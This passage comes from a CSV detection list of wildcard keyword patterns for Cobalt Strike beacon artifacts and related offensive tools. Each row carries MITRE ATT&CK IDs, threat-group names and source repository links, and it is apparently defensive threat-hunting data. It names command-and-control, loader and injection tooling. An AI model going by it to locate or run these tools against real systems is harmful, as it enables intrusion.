TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon.exe*","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon.nim*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","83","12","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" +"*Beacon.Object.File.zip*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" +"*beacon.ps1*beacon.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*beacon.x64*.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon.x64*.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics 
and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon.x64.dll*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*beacon.x86*.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon.x86*.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_api.h*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. 
The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","0","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" +"*beacon_bottom *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 
- T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Beacon_Com_Struct*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*beacon_command_describe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an 
advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_command_detail*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 
- FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_command_detail*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" +"*beacon_command_register*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*beacon_command_register*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_commands*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_compatibility.c*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*beacon_compatibility.h*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*beacon_elevator_describe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 
- TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_elevator_describe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 